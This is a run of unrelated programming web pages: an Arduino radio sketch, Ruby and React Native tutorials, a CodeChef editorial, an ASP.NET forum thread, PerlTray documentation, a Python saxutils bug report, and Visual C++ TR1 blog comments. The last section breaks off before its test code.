    radio.read(&buttonState, sizeof(buttonState));
    if (buttonState == HIGH) {
      analogWrite(ledpin, 600);
      Serial.println("Receiving!");
      delay(200);
    }
  } else {
    analogWrite(ledpin, 630);
    Serial.println("No Signal");
    delay(10);
  }
}
https://forum.arduino.cc/t/nrf24l01-pa-max-power-output-not-working/505700
Bummer! This is just a preview. You need to be signed in with a Basic account to view the entire video. I've added a plain Ruby method called "page_content" to the app. It loads the contents of a text file and returns them as a string. You pass the title of a page to it as an argument, and it uses the "read" method on the core Ruby "File" class to open a ".txt" file from a "pages/" subdirectory within your app's main directory. We've added a page_content method to the app to read contents of a wiki page from a file: def page_content(title) File.read("pages/#{title}.txt") rescue Errno::ENOENT return nil end Here's a quick explanation of page_content's code... Ruby has a core class named File that's used for working with files. File is a subclass of the IO class, so File inherits a class method named read. File.read lets you read the entire contents of a file into a string, using only the file name. You can read more about it here in the IO.read documentation. If the requested file isn't found, the call to File.read may raise an Errno::ENOENT exception. Normally, this would just cause processing of the HTTP request to stop in its tracks. But if we add begin and end keywords before the call that might raise an exception (or, in this case, we can skip begin and end because the code is inside a method), and add a rescue keyword, we can "rescue" our program from being halted by the exception. You can learn more about rescuing exceptions here. - 0:00 I've added the plain Ruby method called page content to the app. - 0:04 You can type in the code you see here if you want. - 0:06 But if you launch a workspace from this video's page, - 0:09 you'll get a workspace with this method already set up for you. - 0:12 The page content method loads the contents of a text file and - 0:16 returns them as a string. 
- 0:18 You pass the title of a page to it as an argument and - 0:21 it uses the read method on the core Ruby file class to open - 0:24 a .txt file from a pages sub directory within your apps main directory. - 0:29 Check the teacher's notes if you'd like to know more about the file.read method. - 0:33 If the file isn't found, file.read will raise this Errno ENOENT exception. - 0:39 So we put this rescue clause here that will intercept that error if it happens - 0:43 and just return nil. - 0:45 So if the file isn't there, we just won't get anything back. - 0:48 Now we need the page's sub directory with text file for it to load from. - 0:52 So I'll create it in folder. - 0:57 Name it pages. - 1:00 And then create a new file within it. - 1:04 This file will hold a bio for one of our Treehouse teachers, Nick Pettit. - 1:08 So I'll name it Nick Pettit.txt. - 1:14 The file name has to end with a .txt extension because that's what the page - 1:17 content method will be looking for. - 1:20 For the file contents, I'll just put Treehouse teacher and game developer. - 1:30 Now let me copy this page content method to a new file all by itself, so - 1:33 I can show you how it works. - 1:35 We'll create a new file, name it test.rb. - 1:41 There's no need to require the Sinatra library since it's not used by any - 1:44 of this code. - 1:46 Now I'll add a call to the method and print the return value. - 1:49 So put this page content and we'll get an argument of - 1:56 Nick Pettit, that's the name of the text file without the txt extension. - 2:03 I didn't include the .txt on the end because page content adds that itself. - 2:08 If you launch the workspace that comes with this video, - 2:10 we'll ensure all that's set up for you. - 2:13 Now let's go to our console and try running this. - 2:15 Ruby space test.rb and they'll load the contents of the text file and print them. - 2:22 Don't worry if you don't understand every detail of how the page - 2:25 content method works. 
- 2:26 That's just what we're using for this particular app and
- 2:29 it's not essential to understanding Sinatra.
- 2:31 There's more info in the teacher's notes if you want it.
- 2:35 We don't have any further need for the test.rb file right now.
- 2:39 So I'm going to delete it from my workspace.
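The test.rb walkthrough above can be sketched as one self-contained script. The directory setup is inlined here so the example runs anywhere; the file name and its contents are the ones used in the video:

```ruby
require "fileutils"

# The method from the app, unchanged.
def page_content(title)
  File.read("pages/#{title}.txt")
rescue Errno::ENOENT
  return nil
end

# Create the pages/ subdirectory and the sample page, as done in the video.
FileUtils.mkdir_p("pages")
File.write("pages/Nick Pettit.txt", "Treehouse teacher and game developer")

puts page_content("Nick Pettit")  # prints: Treehouse teacher and game developer
p page_content("No Such Page")    # prints: nil (file missing, so rescue returns nil)
```

Running `ruby test.rb` prints the bio, and asking for a page that doesn't exist quietly returns nil instead of crashing the request.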
https://teamtreehouse.com/library/loading-text-files
Last Updated on December 12, 2020. The Text component in React Native appears to be simple, but it has a lot of props for customization and usability. Sometimes we want to make the Text component more stylish by giving it shadows with vibrant colors. In such cases, you don't need to rely on any third-party component libraries: React Native's Text itself has such features. All you need are three style props of Text: textShadowColor, textShadowOffset, and textShadowRadius.

import React from 'react';
import {Text, View} from 'react-native';

const App = () => {
  return (
    <View style={{flex: 1}}>
      <View>
        <Text
          style={{
            fontSize: 48,
            color: 'red',
            textShadowColor: 'rgba(0, 0, 0, 0.75)',
            textShadowOffset: {width: 1, height: 1},
            textShadowRadius: 20,
          }}>
          React Native For You
        </Text>
      </View>
    </View>
  );
};

export default App;

Following is the output of this React Native example. That's how you add shadows to Text in React Native.
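As a plain-JavaScript illustration of the same three props (the helper name below is my own, not part of React Native), the shadow settings can be bundled into one reusable style object and merged into any Text style:

```javascript
// Hypothetical helper: collects the three text-shadow props into one
// plain style object that can be merged into a <Text> style.
function makeTextShadow(color, offsetX, offsetY, radius) {
  return {
    textShadowColor: color,
    textShadowOffset: {width: offsetX, height: offsetY},
    textShadowRadius: radius,
  };
}

const shadow = makeTextShadow('rgba(0, 0, 0, 0.75)', 1, 1, 20);
// Usage inside a component would look like:
//   <Text style={[{fontSize: 48, color: 'red'}, shadow]}>...</Text>
console.log(shadow.textShadowRadius); // 20
```

This keeps the shadow definition in one place if several Text components share it.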
https://reactnativeforyou.com/how-to-add-shadows-for-text-component-in-react-native/
PROBLEM LINK:
Practice
Contest [Division 1]
Contest [Division 2]

Author: Mohammad Shahhoud
Editorialist: Darshan Sen

DIFFICULTY:
EASY

PREREQUISITES:

PROBLEM:
Given 2 strings S and R, find the lexicographically smallest permutation of R s.t.: all substrings of S \subseteq all substrings of R

QUICK EXPLANATION:
Remove the characters of S from R, sort the remaining characters of R, and finally inject S into the formed string at its appropriate position.

SOLUTIONS:
A necessary and sufficient condition for the required permutation of R to exist is that it contains S as a substring. The reason is that all the substrings of S are already included in S. We break down our work into a few cases.

Case 1: |R| < |S|
Here the solution doesn't exist, as to have all substrings of S in all substrings of R, R must be at least the size of S. Hence, the required permutation is "Impossible".

Case 2: |R| \geq |S|
We store the frequency of each character in S and R in 2 containers, S_{frequency} and R_{frequency} respectively. Since we know that S must appear as a substring in the solution permutation of R, we first remove the characters of S_{frequency} from R_{frequency}.

Case 2.1: If we get a negative result when we subtract the frequency of a character present in S from R_{frequency}, it means that R does not possess a sufficient quantity of the character contained in S. Hence, the required permutation is "Impossible".

Case 2.2: Now that we have successfully removed the characters of S from R_{frequency}, we generate a string by forming a sequence of ordered clusters of the characters denoted by R_{frequency} and inject S into the correct position. We do this by first finding the first character in S that differs from S_0. If it is less than S_0, we inject S at the beginning of the S_0 cluster; otherwise, we append it to the S_0 cluster.
Time Complexity: O(max(|R|, |\Sigma|)), where \Sigma is the alphabet.

Editorialist's Solution:

#include <algorithm>
#include <iostream>
#include <string>

std::string S, R;

std::string solve(void) {
    // store sizes
    int S_size = S.size();
    int R_size = R.size();
    if (R_size < S_size) {
        /* because to have S as a substring in R,
           R must be larger than or the same size as S */
        return "Impossible";
    } else {
        /* frequency arrays to store the count of characters in S and R */
        int S_frequency[26];
        int R_frequency[26];
        // filling with 0 initially
        std::fill(S_frequency, S_frequency + 26, 0);
        std::fill(R_frequency, R_frequency + 26, 0);
        // filling in the frequencies
        for (int i = 0; i < S_size; ++i) ++S_frequency[int(S[i] - 'a')];
        for (int i = 0; i < R_size; ++i) ++R_frequency[int(R[i] - 'a')];

        /* To have all the substrings of S in the set of all substrings of R,
           it would be sufficient to have just S as a substring in R. */
        /* To find the lexicographically minimum of such permutations of R,
           we simply keep all the remaining characters of R sorted and
           inject string S into its appropriate position. */
        /* There is however one more thing we should be worried about.
           Where exactly do we inject S if there exists a cluster of
           characters (= S[0]) in R? Well, going by the definition of the
           lexicographical order, we find the first character in S that
           differs from S[0]. If it is less than S[0], we place S at the
           beginning of the cluster. In the other case, we put it at the end. */

        // removing the obvious characters of S from R
        for (int i = 0; i < 26; ++i) {
            R_frequency[i] -= S_frequency[i];
            if (R_frequency[i] < 0) {
                /* R doesn't have as many of the character char('a' + i) as S. */
                return "Impossible";
            }
        }

        /* temp_ch stores the first character in S that differs from S[0] */
        char temp_ch = S[0];
        for (int i = 0; i < S_size; ++i) {
            char ch = S[i];
            if (ch != temp_ch) {
                temp_ch = ch;
                break;
            }
        }

        /* res stores the result and is initialized with the empty string */
        std::string res;

        /* We append all the characters < S[0] to res in sorted order. */
        for (char ch = 'a'; ch < S[0]; ++ch) {
            int id = int(ch - 'a');
            while (R_frequency[id]--) res = res + ch;
        }

        if (temp_ch < S[0]) {
            // S should come before the cluster of S[0]'s
            // we first append S to the result
            res += S;
            // then we append the cluster of S[0]'s
            int temp_id = int(S[0] - 'a');
            while (R_frequency[temp_id]--) res = res + S[0];
        } else {
            // the cluster of S[0]'s should come before S
            // we first append the cluster of S[0]'s
            int temp_id = int(S[0] - 'a');
            while (R_frequency[temp_id]--) res = res + S[0];
            // then we append S to the result
            res += S;
        }

        /* We append all the remaining characters > S[0] to res,
           again in sorted order. */
        for (char ch = char(1 + S[0]); ch <= 'z'; ++ch) {
            int id = int(ch - 'a');
            while (R_frequency[id]--) res = res + ch;
        }

        return res;
    }
}

int main(void) {
    int N;
    std::cin >> N;
    while (N--) {
        std::cin >> S >> R;
        std::cout << solve() << std::endl;
    }
    return 0;
}
https://discuss.codechef.com/t/allsum-editorial-unofficial/39530
Dec 04, 2011 09:57 PM|francesco abbruzzese|LINK
Sorry, I made a mistake, u is MyUser, not MembershipUser:

@foreach (MyUser u in Model.AllUsers) {
    ......some user property rendered here
    @foreach (string role in u.UserRoles) {
        .....a role of user rendered here
    }
}

Dec 04, 2011 10:04 PM|multiv123|LINK
Thanks. I'm using a ContactListViewModel already with the view, and using MyUser is giving an error: CS0246: The type or namespace name 'MyUser' could not be found (are you missing a using directive or an assembly reference?)

Dec 04, 2011 10:16 PM|francesco abbruzzese|LINK
It is likely that MyUser is defined in a namespace that is not included in the View. See what the name of the namespace is and add @using namespaceName.

Dec 05, 2011 10:25 AM|francesco abbruzzese|LINK
See if roles is also null. If not, there is a type mismatch between allRoles and roles; I suspect the first one is just an IEnumerable, while the second one is an IEnumerable<MembershipUser>.

Dec 05, 2011 09:18 PM|francesco abbruzzese|LINK
Create a List<MyUser>, say MyList, and in a foreach loop on roles add all the MyUser items contained in roles to MyList, with something like MyList.Add(currItem); then put this list as the value of AllUsers.

Dec 05, 2011 09:58 PM|francesco abbruzzese|LINK
YOU DON'T NEED THIS IN THE VIEW!!! I suggested using the list in the controller, as in my previous post.

All-Star 151752 Points Moderator MVP
Dec 05, 2011 09:58 PM|ignatandrei|LINK
multiv123: "AllUsers = MyList.Add(currItem); it says 'AllUsers' does not exist in the current context"
Maybe it does not exist. Where does it exist?
Dec 05, 2011 10:10 PM|multiv123|LINK
AllUsers is in the MyViewModel.cs file:

public IEnumerable<MyUser> AllUsers { get; set; }

I have included the namespace at the top of the List.cshtml file, but it doesn't seem to be able to find AllUsers... Also, I tried commenting out the line in the for loop with AllUsers, and the Model.AllUsers in the foreach condition doesn't seem to work either.

All-Star 151752 Points Moderator MVP
Dec 05, 2011 10:56 PM|ignatandrei|LINK
multiv123: "AllUsers is in MyViewModel.cs file: public IEnumerable<MyUser> AllUsers { get; set; } I have included the namespace at the top of the List.cshtml file, but it doesn't seem to be able to find the AllUsers"
And you want to invoke it where?! I think you have to make a new instance of the MyViewModel class.

Participant 1247 Points 26 replies Last post Dec 06, 2011 01:01 PM by JonLWright
http://forums.asp.net/p/1746171/4714752.aspx?Re+showing+user+roles+for+users+in+database
perltray - Convert Perl program into a Windows tray application

    perltray [options] perlscript
    perltray [options] project
    perltray
    perltray --help
    perltray --version

The PerlTray utility converts a Perl program into a Windows tray application. This utility combines a Perl program, all of the required Perl modules and a modified Perl interpreter into one binary unit. When the resulting application is run, it searches for modules within itself before searching the filesystem.

Most commonly, PerlTray is invoked with the name of the Perl program that you want converted as an argument. This produces a working application. Some of the options described below make it possible to control which modules are included and how the generated application behaves. PerlTray replaces each @file argument with the arguments parsed from the corresponding file. Bound files can be accessed at runtime with the PerlTray::get_bound_file() and PerlTray::extract_bound_file() functions. File permissions must be specified as an octal number (0555 by default). Use the --dependent option to build a non-freestanding application. Run perltray --help for the full list of options.

FUNCTIONS

The first icon is used as the default icon. The others can be used at runtime using the SetAnimation() and SetIcon() APIs. PerlTray will automatically add architecture and version specific subdirectories the same way the Perl -I option and the Perl lib pragma do. The content of the PERL5LIB environment variable is automatically added via an implicit --lib option. STDOUT and STDERR will be visible in the console window. The first non-option argument is assumed to be the input script filename; thus perltray myscript.pl ... is equivalent to specifying the script explicitly. If the application is built as a singleton, an additional instance forwards its command line to the running instance (via the Singleton() callback) and terminates immediately. The default singleton name is the application name itself.
They are available via the PerlApp:: namespace in addition to PerlTray::, to simplify sharing modules between PerlApp applications and PerlTray applications.

my $datafile = "data.txt";
my $filename = PerlTray::extract_bound_file($datafile);

foreach my $line (split /^/, PerlTray::get_bound_file("data.txt")) {
    # ... process $line ...
}

If the file is not bound, get_bound_file() returns undef in scalar context or the empty list in list context.

The following functions are automatically exported by the PerlTray module:

use PerlTray;

Balloon(INFO, TITLE, ICON, TIMEOUT)

The Balloon() function displays a balloon tooltip for TIMEOUT seconds. The balloon displays the INFO text and TITLE title. In addition, one of these icons can be specified: "info", "warning", "error". Windows limits the range of the timeout value to between 10 and 30 seconds. For example, if you specify a value of '2', Windows displays the balloon for 10 seconds. Only one tooltip can display on the taskbar at any one time. If an application attempts to display a tooltip while another is already displayed, the tooltip will not display until the already-displayed tooltip has been visible for its minimum TIMEOUT value (10 seconds). For example, if a tooltip with a TIMEOUT value of 20 seconds is displayed, and another application attempts to display a tooltip 5 seconds later, the initial tooltip will continue to display for another 5 seconds before it is replaced by the second tooltip.

DisplayMenu()

The DisplayMenu() function displays the popup menu at the current cursor position. This function is typically invoked via a hotkey callback.

Download(URL, CALLBACK)

The Download() function asynchronously downloads a file from a (ftp or http) URL. CALLBACK must be either a string or a code reference. It is evaluated or called when the download is complete. At that time $_ is set to the file content, or undefined if the download was not successful.

Execute(APPLICATION)

The Execute() function starts an APPLICATION. This can be a program name, a document filename, or a URL.
An "http:" URL opens the browser and a "mailto:" URL opens the email client. The Execute() function works similarly to the shell "start" command.

MessageBox(TEXT, CAPTION, FLAGS)

The MessageBox() function displays a modal dialog box with the message TEXT. While the dialog is displayed, the tray menu is disabled. Clicking on the tray icon brings the message box to the foreground and gives it the input focus. CAPTION specifies the message box title. The default is "PerlTray". The FLAGS parameter specifies the type of message box. The default is a box with a single OK button without an icon. Choose the number and types of buttons from the following table: One of the following four icons can be added to the message box: Normally, the first button in the message box is the default button. Use one of the following flags to make the second or third button the default: The function returns the id of the selected push button:

Sample code:

my $flags = MB_YESNO | MB_ICONQUESTION | MB_DEFBUTTON2;
my $ans = MessageBox("Shutdown?", "MyApp", $flags);
if ($ans == IDYES) {
    # ...
}

RegisterHotKey(HOTKEY, CALLBACK)

This function registers a global Windows hotkey and invokes the CALLBACK whenever the HOTKEY is pressed. Hotkeys cannot be undefined, and should not be redefined once they are registered. The HOTKEY definition is a string of modifiers followed by a key code. Valid modifiers are "ALT", "CTRL", "SHIFT", and "WIN". Modifiers and key code are separated with a "+" sign, e.g. 'Alt'+'Ctrl'+'F8'. Valid keycodes are letters and digits, "F" followed by a function key number (1-24), "N" followed by a numeric keypad number (0-9) or one of the following strings:

back backspace tab clear return enter pause capital capslock esc escape space spacebar blank prior pageup pgup next pagedown pgdn end home left up right down select print execute snapshot printscreen prtscn insert delete help sleep numlock scroll scrolllock

It is also possible to specify a VK_* constant as a "hex string", e.g.
'Alt'+'0x1b'. Please see the Microsoft documentation for a list of virtual key codes. The CALLBACK can be either a string to be evaluated or a CODE reference to be called.

Sample code:

RegisterHotKey("alt+0x1b", \&show_balloon);
RegisterHotKey("alt+home", "MessageBox('Foo')");
RegisterHotKey("alt+F2", "DisplayMenu()");
RegisterHotKey("win+2", \&DisplayMenu);

SetAnimation(DURATION, FREQUENCY, ICONS)

The SetAnimation() function animates the tray icon by cycling through all icons in the ICONS list for DURATION milliseconds. The icon is changed every FREQUENCY milliseconds. After DURATION milliseconds the previous tray icon is restored. Please check the documentation of SetTimer() for additional ways to specify the DURATION and FREQUENCY times.

SetIcon(ICON)

The SetIcon() function changes the tray icon to ICON. ICON must be the name of one of the icons bundled with the PerlTray application with the --icon option, but without the ".ico" extension. SetIcon() terminates any icon animation that may be in progress.

SetTimer(ELAPSE, CALLBACK)

The SetTimer() function starts an asynchronous timer, which invokes the CALLBACK every time ELAPSE milliseconds have expired. Note that timers may not trigger if the system time is changed before the ELAPSE time has elapsed. The TimeChange() callback can be used to catch this situation and restart the timers.

The following callback functions are automatically invoked by PerlTray if they are defined:

Click()

The Click() callback is invoked when the user clicks on the tray icon. PerlTray will not call the Click() callback when the click is part of a double-click. The default action for the Click() callback is to display the popup menu. The return value of the Click() callback is ignored.

DoubleClick()

The DoubleClick() callback is invoked when the user double-clicks on the tray icon. The default action for the DoubleClick() callback is to execute the default action defined by the popup menu.
The return value of the DoubleClick() callback is ignored.

PopupMenu()

The PopupMenu() callback is invoked whenever the user clicks on the tray icon to invoke the context menu. It must return a reference to an array of menu item definitions. Each menu item definition is a reference to an array of up to three elements: the LABEL, the ACTION and, sometimes, a CONDITION. For example:

["*Active&State", "Execute ''"],

The LABEL contains the menu text. The menu item can be marked as the default item by prefixing the LABEL with an asterisk. It is then displayed in bold and automatically executed when the user double-clicks on the menu. An ampersand in the LABEL indicates that the next character is the keyboard shortcut. A tab character can be used to divide the menu into a left and right column (the right is typically used to display keyboard shortcuts).

The ACTION entry may contain a variety of types. A code reference is called when this menu item is selected. A string is evaluated as Perl code. Note that any variables referenced in string actions should be package variables. Lexicals will not be visible. An empty string or undefined value as the ACTION disables the menu item and grays out the LABEL. If the ACTION field is missing altogether, the ACTION of the previous menu item is inherited. The variable $_ is set to the LABEL before executing the ACTION. This makes it easy to share a single action among multiple menu items. If the menu LABEL contains a colon, the part of the LABEL after the colon is assigned to $_ instead. A LABEL containing only dashes indicates a separator line. To create a submenu, set the ACTION field to a reference to an array of menu item definitions.

Menu items can also act as radiobuttons. Prefix the LABEL with "o " or "x " for unselected and selected radiobuttons and use a scalar variable reference as the ACTION.
For example:

["o Fast :50", \$freq],
["x Medium :100"],
["o Slow :200"],

PerlTray sets the ACTION variable to the LABEL value of the "x" clause if the variable is not yet defined. Every time the menu is displayed, PerlTray compares the value of the ACTION variable to each LABEL to determine which button is currently selected. Alternatively, the optional CONDITION element can be used to specify which element is selected:

["o Fast", '$freq = 50', $freq==50],
["o Medium", '$freq = 100', $freq==100],
["o Slow", '$freq = 200', $freq==200],

PerlTray also supports checkmarked menu items. Prefix the label with "_ " or "v " for unchecked and checked items. Actions as scalar references work slightly differently from radiobuttons: the variable is set to the LABEL text if it is undefined. If it is already defined (any value), it is set to undefined. This way it toggles between undefined and the LABEL text. A defined value means that the menu gets a checkmark.

["v Checked", \$check],

The third CONDITION argument can once again be used in more complex situations to specify the checked state.

Shutdown(LOGOFF)

The Shutdown() function is called immediately before the application is terminated. It is not possible to abort the termination at this point. The LOGOFF argument is true if the session ends because the user is logging off. It is false during system shutdown.

Singleton(ARGV)

If the PerlTray application has been built using the --singleton option, only a single instance is allowed to run. Each additional instance forwards the command-line parameters to the Singleton() callback of the instance that is already running and then terminates immediately.

TimeChange()

The TimeChange() callback is called whenever the system time is changed. The return value of this callback is ignored.

Timer()

The Timer() callback is the default callback for the SetTimer() function. The return value is ignored.

ToolTip()

The Tooltip() function is called whenever the mouse cursor hovers over the tray icon.
It must return a string value, which will be displayed as a tooltip. The default implementation returns "PerlTray".

The following predefined variables are available to the application created by PerlTray. All PerlTray:: variables documented here are also available via the PerlApp:: namespace.

The $PerlTray::BUILD variable contains the PerlTray build number.

The $PerlTray::PERL5LIB variable contains the value of the PERL5LIB environment variable. If that does not exist, it contains the value of the PERLLIB environment variable. If that one does not exist either, $PerlTray::PERL5LIB is undef.

The $PerlTray::RUNLIB variable contains the fully qualified path name to the runtime library directory specified by the --runlib option. If the --norunlib option is used, this variable is undef.

The $PerlTray::TOOL variable contains the string "PerlTray", indicating that the currently running executable has been produced by the PerlTray tool.

The $PerlTray::VERSION variable contains the PerlTray version number: "major.minor.release", but not including the build number.

PerlTray uses the PERLTRAY_OPT environment variable to set default command-line options. PerlTray treats these options as if they were specified at the beginning of every PerlTray command line. Note: Perl must be in your PATH if you want to use PERLTRAY_OPT. All directories specified in the PERL5LIB environment variable are treated as if they had been specified with the --lib command-line option. Therefore modules located in PERL5LIB directories will be included even in dependent applications. If PERL5LIB is not set, PerlTray will use the value of PERLLIB instead (just like regular Perl). PerlTray will pipe the output of perltray --help through the program specified in the PAGER environment variable if STDOUT is a terminal. The following environment variables are not visible to the application built with PerlTray: PERL5LIB, PERLLIB, PERL5OPT, PERL5DB and PERL5SHELL.
The temporary extraction directory is automatically added to the PATH environment variable when a file is bound using the [extract] option.

When PerlTray can't locate a module that seems to be used or required by the application, it produces an error message:

VMS\Stdio.pm: warn: Can't locate VMS\Stdio.pm
    refby: C:\perl\lib\File\Temp.pm

In general, PerlTray includes a number of platform-specific rules telling it that certain dependencies are likely not required. In those cases, the error messages are downgraded to a warning. In all other cases it is the responsibility of the user to verify if the module is needed or not. PerlTray internally uses a case-sensitive file name lookup and otherwise does not load the file at runtime.

The first thing PerlTray needs to do is to determine which modules and external files the converted script depends upon. The PerlTray program starts out by scanning the source code of the script. When it finds occurrences of use, do or require, it tries to locate the corresponding module and then parse the source of that module. This continues as long as PerlTray finds new modules to examine. PerlTray does not try to run the script. It will not automatically determine which modules might be loaded by a statement such as:

require $module;

In cases like this, try listing additional modules to traverse with the --add option. The PerlTray program has some built-in heuristics for major Perl modules that determine additional modules at runtime, like DBI, LWP, Tk. PerlTray anticipates which additional modules are required so that they are available in freestanding executables. The $PerlTray::VERSION variable will be set to the version number of PerlTray. An application built with PerlTray running with an evaluation license expires when the evaluation license times out. Use the --version option to view the time limit of your current license.

perl(1)

PerlTray is part of the Perl Dev Kit.
More information available at This manpage documents PerlTray version 9.5.0 (build 300008)
http://docs.activestate.com/pdk/9.5/PerlTray.html
Created on 2009-01-21 20:59 by roug, last changed 2010-10-27 18:52 by pitrou. This issue is now closed.

The 'xml' namespace in XML files is special in that it need not be declared. When xml.sax.saxutils.XMLGenerator is used with the namespace feature it does not know how to handle it. Example. The code:

import xml.sax, xml.sax.saxutils
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_namespaces, 1)
c = xml.sax.saxutils.XMLGenerator()
parser.setContentHandler(c)
parser.parse('testfile.xml')

executed on the testfile.xml with this content:

<?xml version="1.0"?>
<a:greetings xmlns:a="http://example.com/a">
  <a:greet xml:lang="en">Hello world</a:greet>
</a:greetings>

will produce this error:

...
File "/usr/lib/python2.5/xml/sax/saxutils.py", line 149, in startElementNS
    self._write(' %s=%s' % (self._qname(name), quoteattr(value)))
File "/usr/lib/python2.5/xml/sax/saxutils.py", line 107, in _qname
    prefix = self._current_context[name[0]]
KeyError: u'http://www.w3.org/XML/1998/namespace'

It can be fixed by making an exception for the xml namespace (as required by the W3C Namespaces in XML recommendation) in xml/sax/saxutils.py. The _qname method could then look like this:

def _qname(self, name):
    """Builds a qualified name from a (ns_url, localname) pair"""
    if name[0]:
        if name[0] == u'http://www.w3.org/XML/1998/namespace':
            return u'xml' + ":" + name[1]
        # The name is in a non-empty namespace
        prefix = self._current_context[name[0]]
        if prefix:
            # If it is not the default namespace, prepend the prefix
            return prefix + ":" + name[1]
    # Return the unqualified name
    return name[1]

I've duplicated the issue and the fix using Python 2.6.2. I'm attaching Soren Roug's fix in patch form. (I created the patch against r53754 of saxutils.py.)

Can you add a unittest, based on the example, that fails before and passes after the patch? Assuming this applies to Py3, make patch against py3k branch (or at least 3.2a1 release), which is now 'trunk'. That aside, the patch is a simple 2-line addition.

I've attached a patch against branches/py3k that tests and fixes the issue.
I don't suppose this fix (if I backport it) could make it into 2.6.6, could it? I've created tests and patches for the trunk and branches/py3k. The only difference between the two is the use of u'' for a Unicode string in the trunk. (IIRC, Py3k treats all strings as Unicode.)

It is about a week too late for 2.6.6. rc1 is just out, and only critically needed fixes go in before the final. For future reference, 'trunk' is frozen. 2.7 patches should be against '2.7maintenace' (or however spelled) but I assume this should apply. 'py3k' is the de facto development trunk. I am not sure what will happen after the switch to hg. Given that you both agree on the fix, I suspect that this is ready for commit review, but I cannot properly review it. I am trying to get information on who to add to nosy.

I figured it was probably too late, but one can always hope. :) While you sort out who gets to review this, I'll see if I can't work out a patch for 2.7. It also occurred to me last night that I should probably add a comment to it. Look for new patches within a day.

There are no specific maintainers for xml.sax.utils. As per RDM's suggestion, Fred or Martin, do either of you have any comments on this or who it might be referred to?

I'm attaching new patches for 2.7 and 3.2, now with comments. :)

Hi guys. I'd like to take a moment to remind everyone that this issue has a small patch with two tests and comments. Please don't let it get lost. :) Thanks, Troy

The patch looks good to me. Committed in r85858 (3.2), r85859 (3.1) and r85860 (2.7). Thank you!
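The round trip can be checked end to end on a current Python, where the committed fix has long been merged. This is a self-contained version of the report's repro (the xmlns:a URI is arbitrary); on affected versions _qname() raised a KeyError for the implicit xml namespace instead:

```python
import io
import xml.sax
import xml.sax.handler
import xml.sax.saxutils

# The document uses xml:lang without declaring the 'xml' prefix,
# which is legal XML per the Namespaces in XML recommendation.
DOC = (b'<?xml version="1.0"?>\n'
       b'<a:greetings xmlns:a="http://example.com/a">\n'
       b'  <a:greet xml:lang="en">Hello world</a:greet>\n'
       b'</a:greetings>')

out = io.StringIO()
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_namespaces, True)
parser.setContentHandler(xml.sax.saxutils.XMLGenerator(out))
parser.parse(io.BytesIO(DOC))

# On Pythons with the fix, the xml:lang attribute survives the round trip.
print('xml:lang' in out.getvalue())
```

If the special case for the xml namespace were missing, the parse call would die inside startElementNS while qualifying the xml:lang attribute name.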
http://bugs.python.org/issue5027
5. We're identifying bugs in TR1 and working with Dinkumware to fix them. Dinkumware's code was very solid to begin with - but as ever, more eyes find more bugs. I've even found a couple of bugs in the TR1 spec. We've also made TR1 and the STL talk to each other in order to improve performance. For example, STL containers of TR1 types (e.g. vector<shared_ptr<T> >, vector<unordered_set<T> >) will avoid copying their elements, just as STL containers of STL containers in VC8 and VC9 avoid copying their elements.

Great stuff! Thanks for the detailed rundown. Looking forward to using it!

Looks nice, but where do we submit TR1 bugs?

If TR1 is just a bunch of headers and maybe some link libraries, and if there are no compiler changes, then why would TR1 not run on VCExpress? With a little bit of manual work, I imagine that it would not be too difficult to get up and running. Is this merely a business decision, or is there actually a technical reason for this restriction? Why, you may ask? I have access to the full version, but I honestly prefer to work in Express. Express removes so much of the unneeded bloat, is faster, and as a result more productive. Similar to the days of VC6.

[Cory Nelson] > Looks nice, but where do we submit TR1 bugs?
Microsoft Connect, or directly to me at stl@microsoft.com .
Stephan T. Lavavej, Visual C++ Libraries Developer

Stephan T. Lavavej, Pretty cool initials you have there. Seems ideal for someone who loves the STL so much.

James, That's a really great idea: use VCExpress to avoid the bloated VS. Is there an official method for paying customers to use (leverage) VCExpress with MFC and TR1? I also find VS has become very bloated since VC6. Overall, I think the VC++ team is doing a good job, but much of Visual Studio does not appeal to me.
Speaking of STL optimizations: is there any specific reason (aside from the "we haven't time to do that") why std::vector doesn't use __is_pod and friends to switch to a memset/memcpy-using implementation where possible? In my tests, this gives noticeable speed increase for small elements - it's more than 2x for chars, and 20% for shorts. Dinkumware has implemented nearly everything in sections 5.2 and 8. Since MS is licensing Dinkumware's implementation, is there a good reason VC9 TR1 does not include sections 5.2 and 8? [Anon.] > Pretty cool initials you have there. Seems ideal for someone who loves the STL so much. Yes (and my initials are so much more convenient to type)! [Jared] > Is there an official method for paying customers to use (leverage) VCExpress with MFC and TR1. No, this is not supported. [Pavel Minaev] > Speaking of STL optimizations: is there any specific reason > (aside from the "we haven't time to do that") why std::vector > doesn't use __is_pod and friends to switch to a > memset/memcpy-using implementation where possible? I thought it did - vector<T>::push_back() eventually calls vector<T>::_Insert_n(), which (should) call _Umove() to move elements from the old memory block to the new memory block. (As I mentioned in , this is broken in the VC9 TR1 Beta.) That eventually calls _Uninit_move(), which - if T is something like char which isn't annotated with _Swap_move_tag - calls unchecked_uninitialized_copy() ("move defaults to copy if there is not a more effecient way"). That eventually calls _Uninit_copy(), of which there are two implementations. The first is for _Nonscalar_ptr_iterator_tag, and the second is for _Scalar_ptr_iterator_tag. The latter calls _CRT_SECURE_MEMMOVE(). Did you define __STDC_WANT_SECURE_LIB__ to 0 when doing your performance comparisons? If not, you might just be seeing the overhead of memmove_s() versus memmove(). 
Of course, now I wonder if memcpy() is actually faster, and whether we should be using _CRT_SECURE_MEMCPY().

[Kevin] > Dinkumware has implemented nearly everything in
> sections 5.2 and 8. Since MS is licensing
> Dinkumware's implementation, is there a good reason
> VC9 TR1 does not include sections 5.2 and 8?

Development time, testing time, and customer value. Shipping C99 compat and special math functions would take more dev and test time (probably not an incredible amount of time, but definitely nonzero). The special math functions are of extremely limited interest (and have not been picked up into C++0x), and the C99 compat, while useful, is of less interest than the Boost-derived components. (I'd like to have <cstdint>, but shared_ptr is about a bazillion times more vital.) So, given limited resources, we chose the Boost-derived components and unordered containers. Does that sound reasonable?

> Of course, now I wonder if memcpy() is actually faster, and whether we should be using _CRT_SECURE_MEMCPY().

Not really, since memmove() in VC checks the ranges for overlap, and delegates to memcpy() if possible anyway. My tests show no noticeable difference for non-overlapping sequences between the two, even for amounts of data as small as 4K. Not a problem with memmove_s(), either - it also does a very quick check, with no observable difference for moderately large vectors. I was also thinking that the difference is because I used memset to zero-initialize my arrays, and vector uses std::fill (it could also use memset to default-initialize PODs, by the way), but again it doesn't seem to make any difference. So I don't know what to make of it.
Here's the code I've used to test:

